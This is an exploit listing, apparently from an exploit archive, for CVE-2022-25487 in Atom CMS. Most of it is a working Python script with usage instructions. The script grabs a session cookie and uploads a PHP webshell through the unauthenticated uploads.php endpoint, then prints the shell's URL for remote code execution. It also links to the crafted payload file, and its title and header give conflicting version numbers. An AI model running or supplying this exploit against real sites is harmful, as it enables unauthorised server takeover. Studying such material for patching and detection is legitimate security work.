Exploit for Atom CMS 1.0.2 Shell Upload CVE-2022-25487

Name: Exploit for Atom CMS 1.0.2 Shell Upload CVE-2022-25487
Rating: 5 (198 reviews)
2022-03-30 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:166532
# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)  
# Date: 22.03.2022  
# Exploit Author: Ashish Koli (Shikari)  
# Vendor Homepage: https://thedigitalcraft.com/  
# Software Link: https://github.com/thedigicraft/Atom.CMS  
# Version: 2.0  
# Tested on: Ubuntu 20.04.3 LTS  
# CVE: CVE-2022-25487  
  
# Description  
This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.  
  
# Usage : python3 exploit.py <IP> <Port> <atomcmspath>  
# Example: python3 exploit.py 127.0.0.1 80 /atom  
  
# POC Exploit: https://youtu.be/qQrq-eEpswc  
# Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link:  
# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC  
  
'''  
Description:  
A file upload functionality in Atom CMS 2.0 allows any  
non-privileged user to gain access to the host through the uploaded files,  
which may result in remote code execution.  
'''  
  
#!/usr/bin/python3  
'''  
Import required modules:  
'''  
import sys  
import requests  
import json  
import time  
import urllib.parse  
import struct  
import re  
import string  
import linecache  
  
  
  
proxies = {  
'http': 'http://localhost:8080',  
'https': 'https://localhost:8080',  
}  
  
'''  
User Input:  
'''  
target_ip = sys.argv[1]  
target_port = sys.argv[2]  
atomcmspath = sys.argv[3]  
  
  
'''  
Get cookie  
'''  
session = requests.Session()  
link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'  
response = session.get(link)  
cookies_session = session.cookies.get_dict()  
cookie = json.dumps(cookies_session)  
cookie = cookie.replace('"}','')  
cookie = cookie.replace('{"', '')  
cookie = cookie.replace('"', '')  
cookie = cookie.replace(" ", '')  
cookie = cookie.replace(":", '=')  
  
'''  
Upload Webshell:  
'''  
# Construct Header:  
header1 = {  
'Host': target_ip,   
'Accept': 'application/json',  
'Cache-Control': 'no-cache',  
'X-Requested-With': 'XMLHttpRequest',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',  
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',  
'Origin': 'http://' + target_ip,  
'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',  
'Accept-Encoding': 'gzip, deflate',  
'Accept-Language': 'en-US,en;q=0.9',  
'Cookie': cookie,  
'Connection': 'close',  
  
}  
  
  
# loading Webshell payload:   
path = 'shell.txt'  
fp = open(path,'rb')  
data= fp.read()  
  
  
# Uploading Webshell:  
link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'  
upload = requests.post(link_upload, headers=header1, data=data)  
  
p=upload.text  
x = re.sub("\s", "\n", p)  
y = x.replace("1<br>Unknown", "null")  
z = re.sub('[^0-9]', '', y)  
  
'''  
Finish:  
'''  
print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')  
print('')